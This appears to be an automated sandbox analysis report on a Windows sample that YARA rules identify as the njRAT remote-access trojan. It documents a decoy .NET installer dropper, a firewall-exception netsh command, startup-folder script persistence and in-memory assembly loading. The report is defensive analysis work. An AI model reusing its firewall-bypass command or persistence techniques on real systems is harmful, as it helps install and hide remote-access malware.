        Source: 11.2.essam@sasa2023.exe.2aeb7cc.2.raw.unpack, type: UNPACKEDPE | Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 11.2.essam@sasa2023.exe.2aeb7cc.2.raw.unpack, type: UNPACKEDPE | Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 11.2.essam@sasa2023.exe.2aeb7cc.2.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: 0000000B.00000002.1945798119.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 0000000B.00000002.1945798119.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 0000000B.00000002.1945798119.0000000002ACB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 0000000B.00000002.1946499918.0000000004CC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 0000000B.00000002.1946499918.0000000004CC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000000B.00000002.1946499918.0000000004CC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 0000000B.00000002.1946499918.0000000004CC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 0000000B.00000002.1946499918.0000000004CC0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exe | Code function: 4_2_69DA4E0D ExitWindowsEx
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exe | Code function: String function: 69DA85BC appears 56 times
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exe | Code function: String function: 69DC8B7A appears 109 times
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exe | Code function: String function: 6990265B appears 183 times
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exe | Code function: String function: 69DD6E1A appears 546 times
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exe | Code function: String function: 698EE8E8 appears 149 times
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exe | Code function: String function: 69DA833E appears 579 times
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exe | Code function: String function: 69D739AD appears 43 times
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | Code function: String function: 0001854A appears 42 times
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | Code function: String function: 00034DF4 appears 54 times
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | Code function: 2_2_00017A0A: GetDriveTypeW,SetErrorMode,SetErrorMode,SetErrorMode,CreateFileW,DeviceIoControl,CloseHandle,SetErrorMode
        Source: SetupResources.dll11.2.dr | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
        Source: SetupResources.dll4.2.dr | Static PE information: No import functions for PE file found
        Source: SetupResources.dll1.2.dr | Static PE information: No import functions for PE file found
        Source: SetupResources.dll22.2.dr | Static PE information: No import functions for PE file found
        Source: SetupResources.dll.2.dr | Static PE information: No import functions for PE file found
        Source: SetupResources.dll14.2.dr | Static PE information: No import functions for PE file found
        Source: SetupResources.dll17.2.dr | Static PE information: No import functions for PE file found
        Source: SetupResources.dll10.2.dr | Static PE information: No import functions for PE file found
        Source: SetupResources.dll13.2.dr | Static PE information: No import functions for PE file found
        Source: SetupResources.dll19.2.dr | Static PE information: No import functions for PE file found
        Source: SetupResources.dll9.2.dr | Static PE information: No import functions for PE file found
        Source: SetupResources.dll5.2.dr | Static PE information: No import functions for PE file found
        Source: SetupResources.dll2.2.dr | Static PE information: No import functions for PE file found
        Source: SetupResources.dll16.2.dr | Static PE information: No import functions for PE file found
        Source: SetupResources.dll21.2.dr | Static PE information: No import functions for PE file found
        Source: SetupResources.dll18.2.dr | Static PE information: No import functions for PE file found
        Source: SetupResources.dll15.2.dr | Static PE information: No import functions for PE file found
        Source: SetupResources.dll8.2.dr | Static PE information: No import functions for PE file found
        Source: SetupResources.dll23.2.dr | Static PE information: No import functions for PE file found
        Source: SetupResources.dll12.2.dr | Static PE information: No import functions for PE file found
        Source: SetupResources.dll3.2.dr | Static PE information: No import functions for PE file found
        Source: SetupResources.dll6.2.dr | Static PE information: No import functions for PE file found
        Source: SetupResources.dll20.2.dr | Static PE information: No import functions for PE file found
        Source: SetupResources.dll0.2.dr | Static PE information: No import functions for PE file found
        Source: SetupResources.dll11.2.dr | Static PE information: No import functions for PE file found
        Source: SetupResources.dll7.2.dr | Static PE information: No import functions for PE file found
        Source: ESjy0irMIn.exe, 00000000.00000002.1752276948.0000000002442000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedotNetFx40_Client_setup.exet* vs ESjy0irMIn.exe
        Source: ESjy0irMIn.exe, 00000000.00000002.1753786714.000000001DEC5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedotNetFx40_Client_setup.exet* vs ESjy0irMIn.exe
        Source: ESjy0irMIn.exe, 00000000.00000000.1719084397.0000000000152000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamedotNetFx40_Client_setup.exet* vs ESjy0irMIn.exe
        Source: ESjy0irMIn.exe, 00000000.00000000.1719084397.0000000000152000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameBoxStub.exeT vs ESjy0irMIn.exe
        Source: ESjy0irMIn.exe, 00000000.00000000.1719263302.000000000025A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameBlackBinderStub.exel% vs ESjy0irMIn.exe
        Source: ESjy0irMIn.exeBinary or memory string: OriginalFilenamedotNetFx40_Client_setup.exet* vs ESjy0irMIn.exe
        Source: ESjy0irMIn.exeBinary or memory string: OriginalFilenameBoxStub.exeT vs ESjy0irMIn.exe
        Source: ESjy0irMIn.exeBinary or memory string: OriginalFilenameBlackBinderStub.exel% vs ESjy0irMIn.exe
        Source: ESjy0irMIn.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\ESjy0irMIn.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ESjy0irMIn.exe.log
        Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winEXE@20/146@4/1
        Source: C:\Users\user\Desktop\ESjy0irMIn.exe | File read: C:\Users\user\Desktop\desktop.ini
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | Code function: 2_2_00018DAE FormatMessageW,GetLastError,LocalFree,2_2_00018DAE
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exe | Code function: 4_2_69D9E9B4 ChangeServiceConfigW,4_2_69D9E9B4
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exe | Code function: 4_2_698F7A10 LoadResource,LockResource,SizeofResource,4_2_698F7A10
        Source: ESjy0irMIn.exe | ReversingLabs: Detection: 73%
        Source: C:\Users\user\Desktop\ESjy0irMIn.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: unknown | Process created: C:\Users\user\Desktop\ESjy0irMIn.exe C:\Users\user\Desktop\ESjy0irMIn.exe
        Source: C:\Users\user\Desktop\ESjy0irMIn.exe | Process created: C:\ProgramData\dotNetFx40_Client_setup.exe "C:\ProgramData\dotNetFx40_Client_setup.exe"
        Source: C:\Users\user\Desktop\ESjy0irMIn.exe | Process created: C:\ProgramData\essam@sasa2023.exe "C:\ProgramData\essam@sasa2023.exe"
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | Process created: C:\b53dd3b256ba71dad061693a386e\Setup.exe C:\b53dd3b256ba71dad061693a386e\\Setup.exe /x86 /x64 /ia64 /web
        Source: C:\ProgramData\essam@sasa2023.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\ProgramData\essam@sasa2023.exe" "essam@sasa2023.exe" ENABLE
        Source: C:\Windows\SysWOW64\netsh.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Name.js"
        Source: C:\Windows\System32\wscript.exe | Process created: C:\ProgramData\essam@sasa2023.exe "C:\ProgramData\essam@sasa2023.exe"
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exe | Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /i "C:\Users\user\AppData\Local\Temp\BlockersInfo1.rtf
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exe | Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /i "C:\Users\user\AppData\Local\Temp\BlockersInfo2.rtf
        Source: C:\Users\user\Desktop\ESjy0irMIn.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
        Source: C:\ProgramData\essam@sasa2023.exe | Code function: 3_2_05171832 AdjustTokenPrivileges,3_2_05171832
        Source: C:\ProgramData\essam@sasa2023.exe | Code function: 3_2_051717FB AdjustTokenPrivileges,3_2_051717FB
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exe | Code function: 4_2_69DA4DC9 AdjustTokenPrivileges,4_2_69DA4DC9
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\Users\user\AppData\Local\Temp\dd_dotNetFx40_Client_setup_decompression_log.txt
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exe | Code function: 4_2_698F697A __EH_prolog3,CoCreateInstance,PathIsRelativeW,PathFileExistsW,PathFileExistsW,PathFileExistsW,PathFileExistsW,CoCreateInstance,VariantClear,PathIsRelativeW,PathFileExistsW,PathFileExistsW,PathFileExistsW,PathFileExistsW,VariantClear,__CxxThrowException@8,VariantClear,VariantClear,VariantClear,4_2_698F697A
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | Code function: 2_2_0001774A GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLastError,GetLogicalDriveStringsW,CharUpperW,_wcschr,GetDiskFreeSpaceExW,2_2_0001774A
        Source: ESjy0irMIn.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.69%
        Source: C:\Users\user\Desktop\ESjy0irMIn.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll
        Source: C:\ProgramData\essam@sasa2023.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\276d7f4a20a3c21c3bf6fc9bfc1915a2\mscorlib.ni.dll
        Source: C:\ProgramData\essam@sasa2023.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
        Source: C:\ProgramData\essam@sasa2023.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exe | Code function: 4_2_698DEFE2 CreateToolhelp32Snapshot,_memset,Process32FirstW,Process32NextW,FindCloseChangeNotification,4_2_698DEFE2
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\NetFxSetupMutex
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7400:120:WilError_03
        Source: C:\ProgramData\essam@sasa2023.exe | Mutant created: \Sessions\1\BaseNamedObjects\7968e3cc8ecdfdd08a129deabeee4932
        Source: C:\ProgramData\essam@sasa2023.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | Command line argument: X?f2_2_000159A6
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | Command line argument: temp2_2_000159A6
        Source: Setup.exe | String found in binary or memory: Pre-Installation Warnings:
        Source: essam@sasa2023.exe.0.dr, CLASS4E803AB8F76B9B9B9B153A22B34577EE5631DDB830601D56AB39010530F75CLASSWQOR4E803AB8F76B9B9B9B153A22B34577EE5631DDB830601D56AB39010530F75.cs | Cryptographic APIs: 'TransformFinalBlock'
        Source: 0.0.ESjy0irMIn.exe.22b53c.2.raw.unpack, CLASS4E803AB8F76B9B9B9B153A22B34577EE5631DDB830601D56AB39010530F75CLASSWQOR4E803AB8F76B9B9B9B153A22B34577EE5631DDB830601D56AB39010530F75.cs | Cryptographic APIs: 'TransformFinalBlock'
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | File opened: C:\Windows\SysWOW64\MsftEdit.dll
        Source: Window Recorder | Window detected: More than 3 window changes detected
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | Window detected: Number of UI elements: 13
        Source: C:\ProgramData\essam@sasa2023.exe | File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
        Source: ESjy0irMIn.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
        Source: C:\ProgramData\essam@sasa2023.exe | File opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dll
        Source: ESjy0irMIn.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
        Source: ESjy0irMIn.exe | Static file information: File size 1078272 > 1048576
        Source: ESjy0irMIn.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x106800
        Source: ESjy0irMIn.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: sqmapi.pdb source: dotNetFx40_Client_setup.exe, 00000002.00000003.1762753670.00000000006AA000.00000004.00000020.00020000.00000000.sdmp, dotNetFx40_Client_setup.exe, 00000002.00000003.1762071417.0000000005261000.00000004.00000020.00020000.00000000.sdmp, dotNetFx40_Client_setup.exe, 00000002.00000003.1762660238.00000000006A3000.00000004.00000020.00020000.00000000.sdmp, dotNetFx40_Client_setup.exe, 00000002.00000003.1762608912.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, Setup.exe, 00000004.00000002.4207935822.0000000069A71000.00000020.00000001.01000000.0000000F.sdmp, sqmapi.dll.2.dr
        Source: Binary string: SetupEngine.pdb source: dotNetFx40_Client_setup.exe, 00000002.00000003.1762071417.0000000004EE3000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, Setup.exe, 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, SetupEngine.dll.2.dr
        Source: Binary string: boxstub.pdb source: ESjy0irMIn.exe, dotNetFx40_Client_setup.exe.0.dr
        Source: Binary string: SetupUtility.pdb source: dotNetFx40_Client_setup.exe, 00000002.00000003.1762071417.0000000004EE3000.00000004.00000020.00020000.00000000.sdmp, SetupUtility.exe.2.dr
        Source: Binary string: Setup.pdb source: dotNetFx40_Client_setup.exe, 00000002.00000003.1762071417.0000000004EE3000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, Setup.exe, 00000004.00000002.4195199090.00000000009A1000.00000020.00000001.01000000.0000000D.sdmp, Setup.exe, 00000004.00000000.1763277251.00000000009A1000.00000020.00000001.01000000.0000000D.sdmp, Setup.exe.2.dr
        Source: Binary string: SetupResources.pdb source: dotNetFx40_Client_setup.exe, 00000002.00000003.1762071417.0000000005261000.00000004.00000020.00020000.00000000.sdmp, SetupResources.dll14.2.dr, SetupResources.dll18.2.dr, SetupResources.dll4.2.dr, SetupResources.dll9.2.dr, SetupResources.dll11.2.dr, SetupResources.dll15.2.dr, SetupResources.dll17.2.dr, SetupResources.dll13.2.dr, SetupResources.dll20.2.dr, SetupResources.dll3.2.dr, SetupResources.dll21.2.dr, SetupResources.dll22.2.dr, SetupResources.dll1.2.dr, SetupResources.dll6.2.dr, SetupResources.dll19.2.dr, SetupResources.dll7.2.dr, SetupResources.dll.2.dr, SetupResources.dll5.2.dr, SetupResources.dll16.2.dr, SetupResources.dll2.2.dr, SetupResources.dll0.2.dr, SetupResources.dll23.2.dr, SetupResources.dll8.2.dr, SetupResources.dll12.2.dr, SetupResources.dll10.2.dr
        Source: Binary string: SetupUi.pdb source: dotNetFx40_Client_setup.exe, 00000002.00000003.1762071417.0000000005261000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, Setup.exe, 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, SetupUi.dll.2.dr

        Data Obfuscation

        Source: 11.2.essam@sasa2023.exe.4cc0000.5.raw.unpack, OK.cs | .Net Code: Plugin System.Reflection.Assembly.Load(byte[])
        Source: 11.2.essam@sasa2023.exe.2ab6fa0.1.raw.unpack, SSLOLCZBV.cs | .Net Code: Main System.AppDomain.Load(byte[])
        Source: 11.2.essam@sasa2023.exe.2ada100.0.raw.unpack, OK.cs | .Net Code: Plugin System.Reflection.Assembly.Load(byte[])
        Source: 11.2.essam@sasa2023.exe.4ca0000.4.raw.unpack, SSLOLCZBV.cs | .Net Code: Main System.AppDomain.Load(byte[])
        Source: C:\Users\user\Desktop\ESjy0irMIn.exe | Code function: 0_2_00007FFD9B76D2A5 pushad ; iretd 0_2_00007FFD9B76D2A6
        Source: C:\Users\user\Desktop\ESjy0irMIn.exe | Code function: 0_2_00007FFD9B88063D push ebx; iretd 0_2_00007FFD9B88066A
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | Code function: 2_2_0002AB05 push ecx; ret 2_2_0002AB18
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | Code function: 2_2_00034EE0 push ecx; ret 2_2_00034EF3
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exe | Code function: 4_2_009A3DF5 push ecx; ret 4_2_009A3E08
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exe | Code function: 4_2_698FAA75 push ecx; ret 4_2_698FAA88
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exe | Code function: 4_2_69902709 push ecx; ret 4_2_6990271C
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exe | Code function: 4_2_69A74821 push ecx; ret 4_2_69A74834
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exe | Code function: 4_2_69A71B89 push ecx; ret 4_2_69A71B9C
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exe | Code function: 4_2_69DD6F06 push ecx; ret 4_2_69DD6F19
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exe | Code function: 4_2_69DCE265 push ecx; ret 4_2_69DCE278
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | Code function: 2_2_0001B4B3 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,2_2_0001B4B3
        Source: dotNetFx40_Client_setup.exe.0.dr | Static PE information: section name: .boxld01
        Source: initial sample | Static PE information: section name: .text entropy: 7.749537444364443
        Source: initial sample | Static PE information: section name: .text entropy: 6.981580872742712
        Source: C:\Users\user\Desktop\ESjy0irMIn.exe | File created: C:\ProgramData\dotNetFx40_Client_setup.exe
        Source: C:\Users\user\Desktop\ESjy0irMIn.exe | File created: C:\ProgramData\essam@sasa2023.exe
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\2052\SetupResources.dll
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\1049\SetupResources.dll
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\1044\SetupResources.dll
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\1043\SetupResources.dll
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\1042\SetupResources.dll
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\1045\SetupResources.dll
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\1046\SetupResources.dll
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\1055\SetupResources.dll
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\1025\SetupResources.dll
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\3082\SetupResources.dll
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\1053\SetupResources.dll
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\1029\SetupResources.dll
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\1028\SetupResources.dll
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\SetupEngine.dll
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\1033\SetupResources.dll
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\Setup.exe
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\1035\SetupResources.dll
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\SetupUtility.exe
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\1036\SetupResources.dll
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\1031\SetupResources.dll
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\2070\SetupResources.dll
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\1032\SetupResources.dll
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\1030\SetupResources.dll
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\1040\SetupResources.dll
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\1041\SetupResources.dll
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\1037\SetupResources.dll
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\SetupUi.dll
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\1038\SetupResources.dll
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\3076\SetupResources.dll
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\sqmapi.dll
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\1033\eula.rtf
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\1025\eula.rtf
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\1028\eula.rtf
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\1030\eula.rtf
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\1031\eula.rtf
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\1029\eula.rtf
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\1036\eula.rtf
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\1035\eula.rtf
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\1032\eula.rtf
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\1038\eula.rtf
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\1037\eula.rtf
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\1040\eula.rtf
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\1041\eula.rtf
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\1042\eula.rtf
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\1044\eula.rtf
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\1043\eula.rtf
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\1046\eula.rtf
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\1045\eula.rtf
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\1055\eula.rtf
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\1053\eula.rtf
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\2052\eula.rtf
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\1049\eula.rtf
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\3082\eula.rtf
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\2070\eula.rtf
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\b53dd3b256ba71dad061693a386e\3076\eula.rtf
        Source: C:\ProgramData\dotNetFx40_Client_setup.exe | File created: C:\Users\user\AppData\Local\Temp\dd_dotNetFx40_Client_setup_decompression_log.txt

        Boot Survival

        Source: C:\ProgramData\essam@sasa2023.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Name.js
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exe | Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application\VSSetup
        Source: C:\b53dd3b256ba71dad061693a386e\Setup.exe | Code function: 4_2_69D9F721 StartServiceW,4_2_69D9F721
